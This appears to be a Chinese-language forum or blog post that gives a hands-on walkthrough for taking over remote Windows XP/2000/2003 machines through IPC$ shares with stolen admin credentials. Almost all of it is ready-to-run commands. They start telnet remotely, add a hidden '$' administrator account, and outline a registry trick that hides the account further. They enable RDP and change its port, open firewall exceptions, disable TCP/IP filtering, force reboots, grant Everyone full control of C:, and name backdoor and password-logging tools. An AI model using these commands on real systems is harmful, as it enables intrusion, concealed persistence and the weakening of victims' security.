IPC$***可謂經典中的經典,廢話不多說,先列出經典命令,不註釋了,都是很簡單的命令,看不懂問度娘
http://baike.baidu.com/view/1551623.htm?fromId=528303
當然假設管理員賬戶名密碼已經得到了
net use \\ip\ipc$ "密碼" /user:"用戶名" ——密碼和用戶名如果沒有空格也可以不加引號,另外\ipc$也可以不寫,如下所示:
net use \\ip 密碼 /user:用戶名
sc \\ip config tlntsvr start= auto ——注意start=後面有個空格
sc \\ip start tlntsvr
telnet ip
input username passwd,thus get remote pc's shell
當然也可以用net time \\ip 配合at指令定時開啓telnet或是別的服務
可以添加用戶名密碼並加爲管理員
net user chy$ chy /add
net localgroup administrators chy$ /add ——用戶名最後加$是可以防止對方在cmd窗口下輸入net user顯示自己添加的用戶名,當然在計算機管理下的用戶還是可以顯示出來的,更深層次的創建隱藏的具有管理員權限的用戶需要直接對註冊表操作,大致思路就是新建一個賬號,然後複製管理員的註冊表信息到新建賬號,註冊表導出,刪除新建賬號,再導入,這樣不僅net user看不到,計算機管理也看不到,一定要在註冊表中才會看到,具體操作不再細說~
關於3389終端常用命令,整理如下(摘自網上):
【注:以下命令全部爲CMD命令,可在 Telnet環境下執行】
1.查詢終端端口 (適用於XP專業版、2000服務器版與2003操作系統):
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
或以下命令:
regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2.開啓XP&2003終端服務
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3.更改終端端口爲20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系統防 火牆對終端服務3389端口的限制及IP連接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.開啓Win2000的終端,端口爲3389(需重啓)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6.強行重啓 Win2000&Win2003系統(執行完最後一條一句後自動重啓)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口篩選 (需重啓)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.終端超出最大連接數時可用下面的命 令來連接
mstsc /v:ip:3389 /console
9.調整NTFS分區權限
cacls c: /e /t /g everyone:F (所有人對c盤都有一切權利)
cacls %systemroot%\system32\*.exe /d everyone (拒絕所有人訪問system32中exe文件)
用工具的操作簡單介紹下,微軟開發的一系列psxxx還是蠻好用的(摘自網上)
psexec.exe \\IP -u 管理員帳號 -p 密碼 cmd \\ 用這個工具我們可以一步到位的獲得 shell,之後做什麼都可以了,安後門可以用 winshell,克隆就用 ca 吧,開終端用 3389.vbe ,記錄密碼用 win2kpass ,隨便選了
當然也可以用OpenTelnet.exe開啓telnet
OpenTelnet.exe \\server 管理員帳號 密碼 NTLM 的認證方式(0) port \\ 用它可以方便的更改 telnet 的驗證方式和端口,方便我們登陸
不可能每次***都是一帆風順的,筆者試驗了兩次,分別在虛擬機和實驗室局域網內做實驗,系統都爲XP,虛擬機一帆風順,而物理機卻存在問題:
net use Z: \\ip\c$ 拒絕訪問,copy命令也拒絕訪問 ,at亦然,貌似除了net time 和net use建立連接以外的命令都不能使用,辛辛苦苦得到了管理員帳號密碼卻發現被堵在門口了是不是覺得很坑爹呢,各種查資料,結果發現其實是歸根到底一個問題,就是系統組策略中——計算機配置——Windows設置——安全設置——本地策略——安全選項——網絡訪問:本地賬戶的共享和安全模型被設置成了僅來賓模式,而不是經典模式。
如果將該設置設置爲“經典”,則使用本地帳戶憑據的網絡登錄會使用這些憑據進行身份驗證。如果將該設置設置爲“僅來賓”,則使用本地帳戶的網絡登錄將自動映射到 Guest 帳戶。“經典”模式允許對資源訪問進行精確控制。使用“經典”模式,可以就同一資源爲不同的用戶授權不同類型的訪問權限。使用“僅來賓”模式,可以公平地對待所有用戶。所有用戶都作爲來賓得到身份驗證,對於指定資源,這些用戶可以獲得相同級別的訪問權限。
問題就出在這邊,手動修改遠程PC的這個選項後就可以完成前述的所有操作,當然通過註冊表命令也行,命令如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"forceguest"=dword:00000000
批處理命令如下:
echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "forceguest"=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg
可是在僅來賓的模式下只有沒有執行權限,找了好多資料,卻始終不能解決由於這個僅來賓模式而導致的無法完全控制遠程PC的問題,百思不得其解,求高手指導~~~